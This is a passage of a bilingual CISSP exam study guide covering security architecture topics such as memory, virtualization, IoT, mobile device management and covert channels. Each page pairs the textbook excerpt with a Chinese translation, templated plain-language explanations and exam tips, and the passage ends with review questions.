参与共同责任,因此我们必须研究、实施并使用安全设计原则来管理工程流程。 理解保护环的概念。 从安全角度来看,保护环将操作系统中的代码和组件组织 成同心环。 越深入环的内部,位于特定环中的代码所关联的权限级别就越高。 描述计算机使用的不同类型的内存。 ROM 是非易失性的,终端用户无法写入。 PROM 芯片只能写入一次。 EPROM/UVEPROM 芯片可通过紫外线擦除。 EEPROM 芯片可通过电流擦除。 RAM 芯片是易失性的,当计算机断电时会丢 失其内容。 了解与内存组件相关的安全问题。 一些安全问题涉及内存组件:断电后数据可 能仍保留在芯片上,以及在多用户系统中对内存访问的控制。 了解内存寻址的概念。 内存寻址方式包括寄存器寻址、立即寻址、直接 寻址、间接寻址和基址+偏移寻址。 描述计算机使用的存储设备的不同特性。 主存储器即内存。 二级存储包括磁 性、闪存和光存储介质,这些介质必须先读入主存储器,CPU 才能使用其中 的数据。 随机存取存储设备可在任意位置读取,而顺序存取设备则需要物理 扫描所有存储的数据才能到达目标位置。 了解与辅助存储设备相关的安全问题。

辅助存储设备主要涉及三个安全问题: 可移动介质可用于窃取数据,必须应用访问控制和加密来保护数据,即使在 文件删除或介质格式化后,数据仍可能保留在介质上。 了解辐射安全性。 许多电子设备会辐射出电信号或电磁辐射,这些信号可能被 未经授权的人员截获。 这些信号可能包含机密、敏感或私密数据。 针对范·艾克 窃听(即窃听)的TEMPEST/EMSEC对策包括法拉第笼、白噪声、控制区和屏 蔽。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

加密:加密把内容变成未授权者看不懂的形式。

入侵防御系统 IPS:IPS 可检测并主动阻断恶意流量。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

IPS 放在线路中,误报可能影响可用性。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
加密 加密把内容变成未授权者看不懂的形式。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
学习单元 101 / PDF P644

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

Understand security risks that input and output devices can pose. Input/output devices can be subject to eavesdropping and tapping, are subject to shoulder surfing, are used to smuggle data out of an organization, or are used to create unauthorized, insecure points of entry into an organization's systems and networks. Be prepared to recognize and mitigate such vulnerabilities. Be aware of JavaScript concerns. JavaScript is the most widely used scripting language in the world and is embedded into HTML documents. Whenever you allow code from an unknown and thus untrusted source to execute on your system, you are putting your system at risk of compromise.

Know about large-scale parallel data systems. Systems designed to perform numerous calculations simultaneously include SMP, AMP, and MPP. Grid computing is a form of parallel distributed processing that loosely groups a significant number of processing nodes to work toward a specific processing goal. Peer-to-peer (P2P) technologies are networking and distributed application solutions that share tasks and workloads among peers. Be able to define OT/ICS. An industrial control system (ICS) or an operational technology (OT) is a form of computer-management device that controls industrial processes and machines.

ICS examples include distributed control systems (DCSs), programmable logic controllers (PLCs), and supervisory control and data acquisition (SCADA). Be aware of distributed systems. A distributed system or a distributed computing environment (DCE) is a collection of individual systems that work together to support a resource or provide a service. The primary security concern is the interconnectedness of the components. Understand data sovereignty. Data sovereignty is the concept that, once information has been converted into a binary form and stored as digital files, it is subject to the laws of the country within which the storage device resides. Be able to define IoT.

The Internet of Things (IoT) is a class of devices that are Internet-connected to provide automation, remote control, or AI processing to appliances or devices. The security issues related to IoT often relate to access and encryption. Understand microservices. A microservice is simply one element, feature, capability, business logic, or function of a web application that can be called upon or used by other web applications. It is the conversion or transformation of a capability of one web application into a microservice that

中文直译 / 整理

了解输入和输出设备可能带来的安全风险。 输入/输出设备可能遭受窃听和搭线 攻击,容易受到窥视攻击,可能被用于将数据偷运出组织,或被用于在组织的 系统和网络中创建未经授权的不安全入口。 请做好识别和缓解此类漏洞的准备。 注意JavaScript相关的安全问题。 JavaScript 是全球使用最广泛的脚本语言, 并嵌入到 HTML 文档中。 每当您允许来自未知且不可信来源的代码在您的系 统上执行时,都会使系统面临被入侵的风险。 了解大规模并行数据系统。 旨在同时执行大量计算的系统包括 SMP、AMP 和 MPP。 网格计算是一种并行分布式处理形式,它将大量处理节点松散地组合在一 起,以实现特定的处理目标。 对等(P2P)技术是网络和分布式应用解决方案, 可在对等节点之间共享任务和工作负载。 能够定义 OT/ICS。 工业控制系统(ICS)或运营技术(OT)是一种用于控制工 业流程和机器的计算机管理设备。 ICS 的示例包括分布式控制系统(DCS)、可 编程逻辑控制器(PLC)和数据采集与监控系统(SCADA)。 了解分布式系统。

分布式系统或分布式计算环境(DCE)是由多个独立系统组 成的集合,它们协同工作以支持资源或提供服务。 主要的安全顾虑在于各组件之 间的互连性。 理解数据主权。 数据主权是指,一旦信息被转换为二进制形式并以数字文件存储, 它即受存储设备所在国家法律的管辖。 能够定义物联网。 物联网(IoT)是一类通过互联网连接以实现家电或设备自 动化、远程控制或人工智能处理的设备。 与物联网相关的安全问题通常涉及访 问权限和加密。 理解微服务。 微服务仅仅是Web应用程序的一个元素、功能、能力、业务逻辑 或函数,可被其他Web应用程序调用或使用。 它是将一个Web应用程序的能力 转换或转变为微服务的过程

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

加密:加密把内容变成未授权者看不懂的形式。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

程序:程序是一步一步怎么做。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

ISO 偏标准和管理体系。

Step-by-step、SOP 常对应 procedure。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
加密 加密把内容变成未授权者看不懂的形式。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
程序 程序是一步一步怎么做。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 102 / PDF P645

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

can be called upon by numerous other web applications. It allows large complex solutions to be broken into smaller self-contained functions. Be able to define IaC. Infrastructure as code (IaC) is a change in how hardware management is perceived and handled. Instead of seeing hardware configuration as a manual, direct hands-on, one-on-one administration hassle, it is viewed as just another collection of elements to be managed in the same way that software and code are managed under DevSecOps (development, security, and operations). Understand hypervisors.

The hypervisor, also known as the virtual machine monitor/manager (VMM), is the component of virtualization that creates, manages, and operates virtual machines. Understand virtual software. A virtual application or virtual software is a software product deployed in such a way that it is fooled into believing it is interacting with a full host OS. A virtual (or virtualized) application has been packaged or encapsulated so that it can execute but operate without full access to the host OS. A virtual application is isolated from the host OS so that it cannot make any direct or permanent changes to the host OS. Know virtual networking.

A virtualized network or network virtualization is the combination of hardware and software networking components into a single integrated entity. The resulting solution allows for software control over all network functions: management, traffic shaping, address assignment, and so on. Know about SDx. Software-defined everything (SDx) refers to a trend of replacing hardware with software using virtualization. SDx includes virtualization, virtualized software, virtual networking, containerization, serverless architecture, infrastructure as code, SDN, VSAN, software-defined storage (SDS), VDI, VMI, SDV, and software-defined data center (SDDC). Know about VDI and VMI.

Virtual desktop infrastructure (VDI) is a means to reduce the security risk and performance requirements of end devices by hosting desktop/workstation OS virtual machines on central servers that are remotely accessed by users. Virtual mobile infrastructure (VMI) is where the OS of a mobile device is virtualized on a central server. Be aware of SDV. Software-defined visibility (SDV) is a framework to automate the processes of network monitoring and response. The goal is to enable the analysis of every packet and make deep intelligence-based decisions on forwarding, dropping, or otherwise responding to threats.

中文直译 / 整理

可被众多其他Web应用程序调用。 它使得大型复杂的解决方案能够被分解 为更小的、自包含的功能。 能够定义基础设施即代码(IaC)。 基础设施即代码(IaC)改变了人们对硬件 管理的认知和处理方式。 与其将硬件配置视为繁琐的手动、直接、一对一的管 理任务,不如将其视为与软件和代码在DevSecOps(开发、安全和运维)中一 样需要管理的另一类元素。 理解虚拟机监控程序。 虚拟机监控程序,也称为虚拟机管理程序(VMM), 是虚拟化中用于创建、管理和运行虚拟机的组件。 理解虚拟软件。 虚拟应用程序或虚拟软件是一种以特定方式部署的软件产品, 使其误以为自己正在与完整的主机操作系统交互。 虚拟(或虚拟化)应用程序已 被打包或封装,以便能够执行,但无需完全访问主机操作系统。 虚拟应用程序与 主机操作系统隔离,因此无法对主机操作系统进行任何直接或永久性更改。 了解虚拟网络。 虚拟网络或网络虚拟化是将硬件和软件网络组件整合为一个统 一实体的过程。 由此产生的解决方案允许通过软件控制所有网络功能:管理、 流量整形、地址分配等。 了解SDx。 软件定义一切(SDx)是指利用虚拟化技术用软件替代硬件的趋势。

SDx包括虚拟化、虚拟化软件、虚拟网络、容器化、无服务器架构、基础设施 即代码、SDN、VSAN、软件定义存储(SDS)、VDI、VMI、SDV和软件定 义数据中心(SDDC)。 了解VDI和VMI。 虚拟桌面基础设施(VDI)是一种通过在中央服务器上托 管桌面/工作站操作系统虚拟机,并由用户远程访问,从而降低终端设备安全 风险和性能要求的方法。 虚拟移动基础设施(VMI)是指将移动设备的操作 系统虚拟化在中央服务器上。 注意SDV。 软件定义可见性(SDV)是一种自动化网络监控和响应流程的框 架。 其目标是实现对每个数据包的分析,并基于深度智能做出转发、丢弃或以 其他方式应对威胁的决策。

小白解释

场景先行:开发团队要上线登录功能。安全不是上线前扫一下漏洞,而是从需求、设计、编码、测试、发布到运维都要参与。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:安全太晚介入,修复成本高,还可能把漏洞带到生产环境。

你作为负责人可以这样想:在 SDLC 早期做威胁建模、代码审查、测试和发布控制。

本页术语用人话说:

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

NIST:NIST 提供美国常用安全标准、框架和指南。

程序:程序是一步一步怎么做。

强制访问控制 MAC:MAC 由系统根据标签和级别强制决定访问。

常见误区:不要只靠上线前一次扫描;安全要嵌入整个生命周期。

读完后用一句话复述:如果我是应用安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是应用安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

ISO 偏标准和管理体系。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Step-by-step、SOP 常对应 procedure。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

自动化测试、持续集成、持续监控是关键词。

排除法提醒:不要只靠上线前一次扫描;安全要嵌入整个生命周期。

本页术语拆解
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
NIST NIST 提供美国常用安全标准、框架和指南。
程序 程序是一步一步怎么做。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
开发安全运营一体化 DevSecOps 把安全自动化嵌入开发和交付流程。
学习单元 103 / PDF P646

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

Know some of the security issues of virtualization. Virtualization doesn't lessen the security management requirements of an OS. Thus, patch management is still essential. It's important to protect the stability of the host. Organizations should maintain backups of their virtual assets. Virtualized systems should be security tested. VM sprawl occurs when an organization deploys numerous virtual machines without an overarching IT management or security plan in place. Understand containerization. Containerization or OS virtualization is based on the concept of eliminating the duplication of OS elements in a virtual machine.

Each application is placed into a container that includes only the actual resources needed to support the enclosed application, and the common or shared OS elements are then part of the hypervisor. Understand embedded systems. An embedded system is typically designed around a limited set of specific functions in relation to the larger product to which it is attached. Be aware of microcontrollers. A microcontroller is similar to but less complex than a system on a chip (SoC). A microcontroller may be a component of an SoC.

A microcontroller is a small computer consisting of a CPU (with one or more cores), memory, various input/output capabilities, RAM, and often nonvolatile storage in the form of flash or ROM/PROM/EEPROM. Examples include Raspberry Pi, Arduino, and FPGA. Understand embedded systems and static environment security concerns. Static environments, embedded systems, cyber-physical systems, HPC systems, edge computing devices, fog computing devices, mobile devices, and other limited or single-purpose computing environments need security management.

These techniques may include network segmentation, security layers, application firewalls, manual updates, firmware version control, and control redundancy and diversity. Know about HPC systems. High-performance computing (HPC) systems are computing platforms designed to perform complex calculations or data manipulations at extremely high speeds. Supercomputers and MPP solutions are common examples of HPC systems. Be aware of RTOS. A real-time operating system (RTOS) is designed to process or handle data as it arrives on the system with minimal latency or delay. An RTOS is usually stored on read-only memory (ROM) and is designed to operate in a hard real-time or soft real-time condition.

中文直译 / 整理

了解虚拟化的一些安全问题。 虚拟化并不会降低操作系统安全管理的要求。 因 此,补丁管理仍然至关重要。 保护主机的稳定性非常重要。 组织应保留其虚拟 资产的备份。 虚拟化系统应进行安全测试。 当组织在没有整体IT管理或安全计 划的情况下部署大量虚拟机时,就会发生虚拟机蔓延。 理解容器化。 容器化或操作系统虚拟化基于消除虚拟机中操作系统元素重复的 概念。 每个应用程序都被放置在一个仅包含支持该应用程序所需实际资源的容 器中,而公共或共享的操作系统元素则成为虚拟机监控程序的一部分。 理解嵌入式系统。 嵌入式系统通常围绕与其所连接的更大产品相关的有限特 定功能进行设计。 了解微控制器。 微控制器与片上系统(SoC)类似,但复杂性较低。 微控制器 可能是SoC的一个组成部分。 微控制器是一种小型计算机,由CPU(一个或多 个核心)、内存、各种输入/输出功能、RAM以及通常以闪存或闪存/ ROM/PROM/EEPROM形式的非易失性存储器组成。 示例包括树莓派、 Arduino和FPGA。 理解嵌入式系统和静态环境安全问题。

静态环境、嵌入式系统、网络物理系统、 高性能计算系统、边缘计算设备、雾计算设备、移动设备以及其他有限或单一用 途的计算环境都需要安全管理。 这些技术可能包括网络分段、安全层、应用防火 墙、手动更新、固件版本控制,以及控制冗余和多样性。 了解HPC系统。 高性能计算(HPC)系统是专为以极高速度执行复杂计算或数 据处理而设计的计算平台。 超级计算机和MPP解决方案是HPC系统的常见示例。 注意RTOS。 实时操作系统(RTOS)旨在在数据到达系统时以最小的延迟或 延迟进行处理或处理。 RTOS通常存储在只读存储器(ROM)中,并设计用 于在硬实时或软实时条件下运行。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

程序:程序是一步一步怎么做。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

防火墙:防火墙根据规则控制网络流量进出。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

ISO 偏标准和管理体系。

Step-by-step、SOP 常对应 procedure。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
程序 程序是一步一步怎么做。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
防火墙 防火墙根据规则控制网络流量进出。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
恢复时间目标 RTO RTO 是业务或系统最多能中断多久。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 104 / PDF P647

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

Understand edge computing. Edge computing is a philosophy of network design where data and the compute resources are located as close as possible to optimize bandwidth use while minimizing latency. In edge computing, the intelligence and processing are contained within each device. Thus, rather than having to send data off to a master processing entity, each device can process its own data locally. Know about fog computing. Fog computing is another example of advanced computation architectures, which is also often used as an element in an IIoT deployment.

Fog computing relies on sensors, IoT devices, or even edge computing devices to collect data, and then transfer it back to a central location for processing. Thus, intelligence and processing is centralized. Understand mobile device security. Personal electronic device (PED) security features can often be managed using a mobile device management (MDM) or unified endpoint management (UEM) solution.

These include device authentication, full-device encryption, communication protection, remote wiping, screen locks, device lockout, GPS and location services management, content management, application control, push notification management, third-party application store control, storage segmentation, asset tracking, removable storage, deactivating unused features, rooting/jailbreaking, sideloading, custom firmware, carrier unlocking, firmware OTA updates, credential management, and text messaging security. Understand mobile device deployment policies.

A number of deployment models are available for allowing and/or providing mobile devices for employees to use while at work and to perform work tasks when away from the office. Examples include BYOD, CYOD, COPE, and COMS/COBO. You should also consider VDI and VMI options. Understand process isolation. Process isolation requires that the OS provide separate memory spaces for each process's instructions and data. It also requires that the OS enforce those boundaries, preventing one process from reading or writing data that belongs to another process. Be aware of hardware segmentation.

Hardware segmentation is similar to process isolation in purpose—it prevents the access of information that belongs to a different process/security level. The main difference is that hardware segmentation enforces these requirements through the use of physical hardware controls rather than the logical process isolation controls imposed by an OS.

中文直译 / 整理

了解边缘计算。 边缘计算是一种网络设计哲学,其中数据和计算资源尽可能靠 近放置,以优化带宽使用并最小化延迟。 在边缘计算中,智能和处理功能包含在 每个设备内。 因此,无需将数据发送到主处理实体,每个设备都可以在其本地处 理自己的数据。 了解雾计算。 雾计算是先进计算架构的另一个例子,也常用于IIoT部署中。 雾 计算依赖传感器、物联网设备甚至边缘计算设备来收集数据,然后将其传输回中 央位置进行处理。 因此,智能和处理能力是集中的。 了解移动设备安全。 个人电子设备(PED)的安全功能通常可以通过移动设备 管理(MDM)或统一端点管理(UEM)解决方案进行管理。 这些功能包括设 备身份验证、全设备加密、通信保护、远程擦除、屏幕锁定、设备锁定、 GPS和位置服务管理、内容管理、应用程序控制、推送通知管理、第三方应用 商店控制、存储分段、资产跟踪、可移动存储、停用未使用的功能、越狱/破解、 侧载、自定义固件、运营商解锁、固件OTA更新、凭证管理以及短信安全。 了解移动设备部署策略。 为允许和/或向员工提供在工作中使用移动设备并在离 office 时执行工作任务,有多种部署模型可供选择。

示例包括 BYOD 、 CYOD、COPE和COMS/COBO。 您还应考虑VDI和VMI选项。 理解进程隔离。 进程隔离要求操作系统为每个进程的指令和数据提供独立的内 存空间,并要求操作系统强制执行这些边界,防止一个进程读取或写入属于另 一个进程的数据。 注意硬件分段。 硬件分段在目的上类似于进程隔离——它防止访问属于其他进 程/安全级别的信息。 主要区别在于,硬件分段通过物理硬件控制来强制执行这 些要求,而不是由操作系统施加的逻辑进程隔离控制。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

加密:加密把内容变成未授权者看不懂的形式。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

程序:程序是一步一步怎么做。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

ISO 偏标准和管理体系。

Step-by-step、SOP 常对应 procedure。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
加密 加密把内容变成未授权者看不懂的形式。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
程序 程序是一步一步怎么做。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
身份 身份是主体在系统中的标识。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 105 / PDF P648

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

Understand the need for system security policy. The role of a system security policy is to inform and guide the design, development, implementation, testing, and maintenance of a particular system. Thus, this kind of security policy tightly targets a single implementation effort. Be able to explain what covert channels are. A covert channel is a method that is used to pass information over a path that is not normally used for communication. Using a covert channel provides a means to violate, bypass, or circumvent a security policy undetected. Basic types are timing and storage. Know about vulnerabilities due to design and coding flaws.

Certain attacks may result from poor design techniques, questionable implementation practices and procedures, or poor or inadequate testing. Some attacks may result from deliberate design decisions when special points of entry, built into code to circumvent access controls, login, or other security checks often added to code while under development, are not removed when that code is put into production. Poor coding practices and lack of security consideration are common sources or causes of vulnerabilities of system architectures that can be attributed to failures in design, implementation, prerelease code cleanup, or out-and-out coding mistakes. Written Lab 1.

Name three types of ICSs and describe what they do or how they are used. 2. Name the three pairs of aspects or features used to describe storage. 3. Name some vulnerabilities found in distributed architectures. 4. There are numerous server-based technologies that both increase computation and resource access capabilities and also introduce new risks to be managed. Name at least 10 examples of these technologies (over 20 were included in this chapter). 5. In relation to mobile devices, list seven of the potential on-device security features, list the four main deployment models, and list seven of the issues that should be addressed on a mobile device deployment policy.

中文直译 / 整理

理解系统安全策略的必要性。 系统安全策略的作用是告知并指导设计、开发, 特定系统的实现、测试和维护。 因此,这种安全策略紧密针对单一的实现工作。 能够解释什么是隐蔽通道。 隐蔽通道是一种通过非正常通信路径传递信息的方法。 使用隐蔽通道提供了一种在不被发现的情况下违反、绕过或规避安全策略的手段。 基本类型包括时序和存储。 了解因设计和编码缺陷导致的漏洞。 Certain attacks ma y result from poor desi gn techni ques, questionable 实现实践和程序,或测试不充分或不恰当。 某些攻击可能源于故意的设计决策, 例如在代码中内置特殊入口点以绕过访问控制、登录或其他安全检查,这些通 常在开发过程中添加,但在代码投入生产时未被移除。 糟糕的编码实践和缺乏 安全考量是系统架构漏洞的常见来源或原因,这些漏洞可归因于设计、实现、 发布前代码清理或纯粹的编码错误中的失败。 书面实验 1. 列出三种ICS类型,并描述它们的功能或使用方式。 2. 列出用于描述存储的三对特性或方面。 3. 列出分布式架构中发现的一些漏洞。

4. 存在许多基于服务器的技术,它们既能增强计算和资源访问能力,也 会引入新的需要管理的风险。 请至少列举10种此类技术(本章包含了20 多种)。 5. 关于移动设备,请列出七种潜在的设备端安全功能、四种主要部署模型, 以及移动设备部署策略中应解决的七项问题。

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

政策:政策是高层原则,说明必须遵守什么。

程序:程序是一步一步怎么做。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Policy 高层、强制、稳定;Procedure 具体步骤。

Step-by-step、SOP 常对应 procedure。

日志要保护完整性、时间同步和访问控制。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 106 / PDF P649

章末总结与练习题

章末内容用来反查自己是否真的理解,而不是只背答案。

教材原文段落

Review Questions 1. While designing the security for the organization, you realize the importance of not only balancing the objectives of the organization against security goals but also focusing on the shared responsibility of security. Which of the following is considered an element of shared responsibility? (Choose all that apply.) A. Everyone in an organization has some level of security responsibility. B. Always consider the threat to both tangible and intangible assets. C. Organizations are responsible to their stakeholders for making good security decisions to sustain the organization. D.

When working with third parties, especially with cloud providers, each entity needs to understand their portion of the shared responsibility of performing work operations and maintaining security. E. Multiple layers of security are required to protect against adversary attempts to gain access to internal sensitive resources. F. As we become aware of new vulnerabilities and threats, we should consider it our responsibility (if not our duty) to responsibly disclose that information to the proper vendor or to an information sharing center. 2. Many PC OSs provide functionality that enables them to support the simultaneous execution of multiple applications on single-processor systems.

What term is used to describe this capability? A. Multistate B. Multithreading C. Multitasking D. Multiprocessing 3. Based on recent articles about the risk of mobile code and web apps, you want to adjust the security configurations of organizational endpoint devices to minimize the exposure. On a modern Windows system with the latest version of Microsoft's browser and all others deactivated or blocked, which of the following is of the highest concern?

中文直译 / 整理

复习问题 1. 在为组织设计安全措施时,您意识到不仅需要平衡组织目标与安全目标, 还需要关注安全的共同责任。 以下哪项被视为共同责任的要素? (可多选) A. 组织中的每个人都有一定程度的安全责任。 B. 始终考虑对有形和无形资产的威胁。 C. 组织有责任对其利益相关者做出良好的安全决策,以维持组织的持续运 营。 D. 与第三方合作时,尤其是与云服务提供商合作时,每个实体都需要 明确自己在执行工作操作和维护安全方面的共同责任部分。 E. 需要多层安全措施来防范攻击者试图访问内部敏感资源。 F. 当我们发现新的漏洞和威胁时,应将其视为我们的责任(如果不是义务的话) 来负责任地披露 该信息给相应的厂商或信息共享中心。 2. 许多PC操作系统提供了在单处理器系统上同时运行多个应用程序的功 能。 用于描述此功能的术语是什么? A. 多状态 B. 多线程 C. 多任务处理 D. 多处理 3. 基于最近关于移动代码和网页应用风险的文章,您希望调整组织终端设备 的安全配置,以最小化暴露风险。 在安装了最新版本微软浏览器且其他浏览 器均被停用或阻止的现代Windows系统上,以下哪项是最高优先级的关注 点?

小白解释

场景先行:你是公司的安全负责人,正在读第 649 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:章末内容用来反查自己是否真的理解,而不是只背答案。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

程序:程序是一步一步怎么做。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“章末总结与练习题”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

